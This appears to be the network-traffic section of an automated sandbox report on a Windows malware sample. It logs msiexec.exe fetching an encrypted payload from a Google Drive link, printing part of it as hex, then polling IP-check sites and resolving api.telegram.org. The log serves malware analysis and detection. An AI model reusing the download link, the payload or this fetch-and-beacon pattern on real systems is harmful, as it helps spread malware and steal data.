                                        Oct 8, 2024 03:32:40.382668018 CEST1.1.1.1192.168.2.50xf2adNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                        Oct 8, 2024 03:32:51.583779097 CEST1.1.1.1192.168.2.50x70eaNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                        • drive.google.com
                                        • drive.usercontent.google.com
                                        • reallyfreegeoip.org
                                        • api.telegram.org
                                        • checkip.dyndns.org
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.549864158.101.44.242802364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 8, 2024 03:32:38.122438908 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 8, 2024 03:32:38.713556051 CEST320INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:38 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 16774d06377dd22722f0d40a11a124b4
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Oct 8, 2024 03:32:38.718175888 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Oct 8, 2024 03:32:40.103478909 CEST320INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:40 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: e11ec9c629771debda616ea60ad33617
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Oct 8, 2024 03:32:41.017138958 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Oct 8, 2024 03:32:41.195625067 CEST320INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:41 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: d827fc5059c151b27dcd30160d79ae95
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.549892158.101.44.242802364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 8, 2024 03:32:41.826021910 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Oct 8, 2024 03:32:43.414864063 CEST320INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:43 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: e9beaa4e6d142f5b25452cf36d8d0ce6
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.549909158.101.44.242802364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 8, 2024 03:32:44.021061897 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 8, 2024 03:32:44.628424883 CEST320INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:44 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: eb187862f4e664e8d31ca6d97765cec4
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.549916158.101.44.242802364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 8, 2024 03:32:45.257210016 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 8, 2024 03:32:45.817893028 CEST320INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:45 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 10ea7ebe0f728bcec3128dc1611c1b7a
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.549927158.101.44.242802364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 8, 2024 03:32:46.425205946 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 8, 2024 03:32:47.008312941 CEST320INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:46 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 40d896017d859ad5b13be313f6e81946
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.549936158.101.44.242802364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 8, 2024 03:32:47.617928028 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 8, 2024 03:32:48.179914951 CEST320INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:48 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: fdc2d5fee3237284b6019e1ada7f0ee2
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.549945158.101.44.242802364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 8, 2024 03:32:48.825970888 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 8, 2024 03:32:49.386369944 CEST320INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:49 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: e8eb81684ec07ea11f9dcd9d222ef817
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.549956158.101.44.242802364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 8, 2024 03:32:50.182240963 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 8, 2024 03:32:50.928838968 CEST320INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:50 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 0388157882d5ca8deca7488a682518ab
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.549828216.58.206.464432364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 01:32:33 UTC216OUTGET /uc?export=download&id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.google.com
                                        Cache-Control: no-cache
                                        2024-10-08 01:32:34 UTC1610INHTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Tue, 08 Oct 2024 01:32:33 GMT
                                        Location: https://drive.usercontent.google.com/download?id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Cross-Origin-Opener-Policy: same-origin
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                        Content-Security-Policy: script-src 'nonce-JZ0f4AgRcF4v0WuY9oSCeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.549838216.58.206.654432364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 01:32:34 UTC258OUTGET /download?id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd&export=download HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Cache-Control: no-cache
                                        Host: drive.usercontent.google.com
                                        Connection: Keep-Alive
                                        2024-10-08 01:32:37 UTC4897INHTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Content-Security-Policy: sandbox
                                        Content-Security-Policy: default-src 'none'
                                        Content-Security-Policy: frame-ancestors 'none'
                                        X-Content-Security-Policy: sandbox
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Resource-Policy: same-site
                                        X-Content-Type-Options: nosniff
                                        Content-Disposition: attachment; filename="mUXDFpAccA156.bin"
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                        Accept-Ranges: bytes
                                        Content-Length: 275520
                                        Last-Modified: Mon, 07 Oct 2024 14:14:22 GMT
                                        X-GUploader-UploadID: AHmUCY1M2kxoe3KWMvcQn5Xr47ynSryIPdsfXDlcG2_YIg2dCVw9SJC1qL6rwMWx9P6uVFOJHT8SR6rF6w
                                        Date: Tue, 08 Oct 2024 01:32:37 GMT
                                        Expires: Tue, 08 Oct 2024 01:32:37 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=SD0nKw==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close
                                        2024-10-08 01:32:37 UTC4897INData Raw: 9a a0 08 bf 98 7c b6 95 1a 9c 29 e5 14 ba 99 87 5a b2 c9 c6 1a 68 c7 bf df 7e b3 e3 a4 52 76 2a 22 9b 46 5c 33 fd 6b 4f 8a 36 44 8a 47 11 de fe 8d 4a 3c e0 ff 9d 71 cc c2 11 c7 c0 24 dd 91 09 7c 09 e5 f0 53 f9 db 59 a8 6e 47 f1 af 5e e8 18 ef 66 2f 8e 75 d7 68 f4 d0 90 9b af 97 d5 72 9a 06 40 a4 d0 35 e1 97 fc e8 a9 2f 74 f4 3f cc 6c b0 c6 83 54 c1 ee 90 0c be 31 33 ec b9 d5 ff f1 08 e8 f9 69 75 c9 ea 9a bd f4 4c 86 60 77 8d 17 a4 53 e7 f4 45 dc 60 cf 38 fe e8 8f 31 09 ae 92 d3 60 7a 5b c4 dd 7c 56 7f e7 a3 30 db d9 1a 0a d7 c8 47 87 e6 5a f3 65 87 36 6e d5 cb 72 e4 cf 95 32 3d ae 34 ce 4f ca 04 16 c3 a3 63 25 fd e7 ac ba 75 26 83 36 af 21 df fd ba d6 c0 aa 98 1f 86 2b d0 c1 e0 bf 5e 77 47 f8 88 f3 73 56 69 89 c4 71 0d b2 bf 19 4c ba 4d 26 d4 b8 b6 23 6d
                                        Data Ascii: |)Zh~Rv*"F\3kO6DGJ<q$|SYnG^f/uhr@5/t?lT13iuL`wSE`81`z[|V0GZe6nr2=4Oc%u&6!+^wGsViqLM&#m
                                        2024-10-08 01:32:37 UTC4897INData Raw: da 44 ba 7c 28 6b 3f e6 c4 b1 66 bd 7e 0b 16 00 be e8 3b 71 38 74 d5 0e 52 b0 34 54 85 b1 69 01 f8 10 e2 d4 70 cf 94 1a 64 b7 0f db cd cf 36 c6 99 8d 35 41 52 a0 c2 b7 91 8f 2d 0f 0e 62 d9 60 04 e6 d2 d2 fb b0 ac 74 de c3 ce ba c2 33 a0 37 3a e9 59 9e 3c b2 aa f7 11 cf 51 40 7a ad 0f af b5 81 7d 71 d0 3e 26 4c 14 08 cc 15 98 b3 6c 3d c3 b0 ae ff a7 89 be 58 da cd f4 3b 6d a8 ea d1 d0 f1 52 b2 0b ae f3 ad 4a 61 08 7e 32 e4 1b 50 65 15 56 f3 56 4e ad 33 0a 55 34 bd 81 d5 71 92 38 77 06 9f 02 b2 19 c4 7d 65 aa 3a 44 16 cd fb 2a eb 69 f6 d4 7a 31 a6 8a 51 d9 52 cb 9e b8 ed 56 74 61 94 4f 04 23 18 aa 2a 16 9e 7b 7a e0 ea 73 7b 62 03 53 e8 12 a6 ea 2c cc 81 af 58 1f 2f ad aa 5b 33 61 61 c1 f5 0e 4c db 97 04 8e b3 68 b4 75 1e cc 07 c4 4a 6e 4c 98 da 07 d4 96 b5
                                        Data Ascii: D|(k?f~;q8tR4Tipd65AR-b`t37:Y<Q@z}q>&Ll=X;mRJa~2PeVVN3U4q8w}e:D*iz1QRVtaO#*{zs{bS,X/[3aaLhuJnL
                                        2024-10-08 01:32:37 UTC6INData Raw: 7f 82 fb eb 5f 9c
                                        Data Ascii: _
                                        2024-10-08 01:32:37 UTC1325INData Raw: f4 01 10 e8 d9 fa e5 ec dc 86 56 d2 da 28 eb 0e 32 8d 7b fe 4f e0 a9 00 49 35 0d 72 84 b8 9a e9 af e3 c8 db e9 31 2d 44 14 b5 89 f1 e7 bc 1e 5f c1 f5 be 46 a5 1a 0f a6 b5 0a 71 55 4e 68 ab 99 e8 74 3a fb d3 82 b3 a9 39 53 ae 6d 3e ce d5 ff 03 5d d7 f0 8c d7 36 99 04 4b 00 47 dc 9b e1 db de 26 71 8d 21 db 3d fc 6b 9a 0e 7d a4 0c 51 89 bc 82 72 71 c4 ec 07 00 9e 4b b9 ec 57 7e 29 34 73 9d e2 83 48 6f db db 5d ca 64 f1 04 fb 47 a0 be a3 4d f5 fe 35 65 f0 91 0e 9c 44 3a 8f 24 a2 1d 3b fa 59 2d cc a4 69 d4 d5 4d 6a 25 9a 1f 91 89 17 60 0c 6d 09 63 d6 05 e9 83 be cb 3c f0 33 32 c2 5b 5b 5c d5 a0 96 ac 2d 49 27 ac f3 2a 18 f9 e8 a9 51 22 82 9c 20 c1 b8 c7 fe 9c 9e b9 2b 73 eb 0e 6c 57 9d f0 5e 3c c7 37 ce fb 4f 9b 99 c8 99 7f 4b 2f 21 44 db a1 15 0c 7a e4 2f 83
                                        Data Ascii: V(2{OI5r1-D_FqUNht:9Sm>]6KG&q!=k}QrqKW~)4sHo]dGM5eD:$;Y-iMj%`mc<32[[\-I'*Q" +slW^<7OK/!Dz/
                                        2024-10-08 01:32:37 UTC1390INData Raw: 1f e8 cc e5 65 f4 fb 3c 28 69 5f 81 9c 31 5e 7a aa 31 05 b9 52 30 eb 0e fc 1f f9 1f 97 4a cc 6b 4a 25 d2 a7 c0 7e 78 fa d9 df f4 aa 0b 8b 32 ad ab e4 da ba 03 be c4 26 8b b4 91 9a 6b 80 4f fe ba e5 4a de 4a c5 84 6b 56 70 87 95 7a d6 cb 72 47 ea 4d 4b b8 a2 c5 67 82 0d 6c 10 0c 51 53 6f 4e 3f c0 92 e2 f1 89 42 aa c0 df e9 76 5f 35 ab 9c b5 4a 82 e6 7d d0 16 2a dd 48 9f b2 1c d9 c1 b5 11 87 4e c1 cf be 99 94 97 85 54 a5 82 4a f3 25 98 3d a6 6a 3c 71 5c 8a 70 2a 2a cd 7a f8 76 cd 4c de 36 6f ea 16 e6 a3 a7 dd d5 f4 e6 cc 0c 68 c1 3e db 95 d2 ac b2 cf 51 9f c7 b7 61 7c 4e 26 a3 b9 7e 18 7a 50 eb fb 7a 8c 6a 5c 24 41 c3 1d bc 5d 80 60 86 84 b4 89 ee 38 6f ce 96 de a8 58 6f 51 02 b1 46 30 f7 5d 46 28 7b 16 0a f5 e5 78 3f 04 bd a0 db 13 11 97 52 d7 21 10 ba b1
                                        Data Ascii: e<(i_1^z1R0JkJ%~x2&kOJJkVpzrGMKglQSoN?Bv_5J}*HNTJ%=j<q\p**zvL6oh>Qa|N&~zPzj\$A]`8oXoQF0]F({x?R!
                                        2024-10-08 01:32:37 UTC1390INData Raw: 4d 50 a0 7c cb 4c b7 de e1 2c 4a 57 a6 32 a6 ed ff 5e 81 dd 11 6f 53 2f 68 9d be 86 52 47 6b f5 cf 4c 4e 2b eb fb 26 94 76 ca 5e 79 2e 3f 53 78 81 62 60 9b 90 88 16 62 5f ea 89 7c dc 22 c6 06 6c 58 03 53 3f f4 49 d8 48 67 de d3 4c 95 87 b4 59 e6 b7 68 86 c3 25 6b bb fa c2 6e e6 1e fb c9 3d b6 50 e8 7e fe e7 f3 be 8b ab eb 45 d1 82 2d a0 2d 1d a6 c0 f2 06 b7 15 98 fe 66 3a 1c 44 31 03 ea 7a 0a 85 1e 31 b0 d7 88 80 03 00 3c ef 43 50 d8 64 f9 db 53 bf 64 47 d9 32 a1 e8 12 89 66 2f 8e 75 a9 5d f4 90 94 e9 f8 95 d5 02 8c 2e c1 a4 d0 3f f7 69 fd fb a2 3e 7f cd f4 cd 6c b0 b8 a8 54 c1 ea b8 e7 be 31 39 ff 35 ab c9 f1 06 f3 31 bd 65 7d 93 41 b4 cd 4d ca a7 40 27 7e de 2d d6 89 0e 6a 07 bd 59 85 e0 9a 50 67 ca fd 87 40 14 3e e4 87 7e 38 5f 84 cd 6e b4 96 49 2e 92
                                        Data Ascii: MP|L,JW2^oS/hRGkLN+&v^y.?Sxb`b_|"lXS?IHgLYh%kn=P~E--f:D1z1<CPdSdG2f/u].?i>lT1951e}AM@'~-jYPg@>~8_nI.
                                        2024-10-08 01:32:37 UTC1390INData Raw: 35 3a 08 ab 97 03 72 38 04 c9 26 0f 6e 24 7b bb 7b 68 0a f5 3a c9 d5 58 ad 80 ca 3b 69 0f da cf e2 36 87 df ff cf 4c 52 d0 d5 60 92 8f 2d 39 2a 74 a7 b5 05 e6 d6 f4 ff b0 ac 72 b1 7a ce b8 c8 41 70 8e 3b 99 71 de 3c b2 a0 41 5b cf 51 4a 52 e7 0f af bf ff 62 71 d0 3a 0e 07 14 08 c6 60 8d a7 78 cd 78 b0 ae e5 d3 0a be 1d db c1 f5 28 2f 93 fa 60 a0 9e e9 a1 0b a4 e2 a5 34 0b 6b 7e 36 90 53 57 4d 4b 25 4f 5c 4d c8 00 b7 55 3e d8 e5 fd 2b 98 38 7a 04 02 cf ed 19 c5 59 1c bd fe 50 1c bd 5e 08 93 27 42 d4 70 3c 6b c8 49 ab 6e ab f6 c8 4f 79 61 1f df 26 04 27 b0 9c 34 64 d5 70 72 87 3b 3c 60 1c 15 40 ed 16 d8 01 5f a7 8b 0d 77 10 5b 4c bf 59 2c af 49 b4 ff 0e 98 ba cb 15 88 95 6d ad 7a ff a4 6d ab fe 6e 90 83 de 68 b1 f9 0a 9f 43 80 b9 c6 e8 0e 47 36 e2 0d 2a 0f
                                        Data Ascii: 5:r8&n${{h:X;i6LR`-9*trzAp;q<A[QJRbq:`xx(/`4k~6SWMK%O\MU>+8zYP^'Bp<kInOya&'4dpr;<`@_w[LY,ImzmnhCG6*
                                        2024-10-08 01:32:37 UTC1390INData Raw: 75 e2 e7 db 2b de 1d 8b 06 05 e6 3c 51 f5 94 36 5a 06 ce 9e 55 10 82 b6 d1 b7 57 7f 06 4d c6 e8 e9 89 38 56 92 c6 d0 8c c6 d4 12 a0 14 d2 a2 a8 ef a0 44 62 e6 c9 25 7e b4 0e 98 aa 3a 72 0e 2d 84 6f 8f e9 b9 b5 c9 cf 3f ae 96 bf 75 41 f6 03 7b f1 8f 2c 78 a9 0a ff f1 f8 79 19 9c e3 7f da 73 9f fe fd df 34 89 3f 54 d5 b9 f3 50 ba a2 cd 81 e5 26 f1 5f 82 e4 a8 a6 eb f0 af c9 89 5f ec 59 6e 5d 4f ce 03 bd c7 3d d7 f3 c3 18 9f c2 f8 0b 78 23 30 49 e4 87 df 0c 70 9c 5f 91 e2 33 bd cf a3 25 0a 19 ac dc 4c c4 ea 17 86 31 63 1a cc 5f 91 25 48 c8 86 68 60 3d 35 94 41 d1 ec 7b 74 cb 4a 80 7f ca 85 c4 81 2b aa 28 55 3f 51 1f 50 8c b2 d6 c6 dd 5b 31 e1 52 b7 46 08 3a c2 a2 7f 3a 5a 4f f5 f7 7c 84 8b aa 04 95 07 02 93 17 9d 0c 94 09 9b 8f d4 7b 1c a4 0f ac 94 1c 86 c4
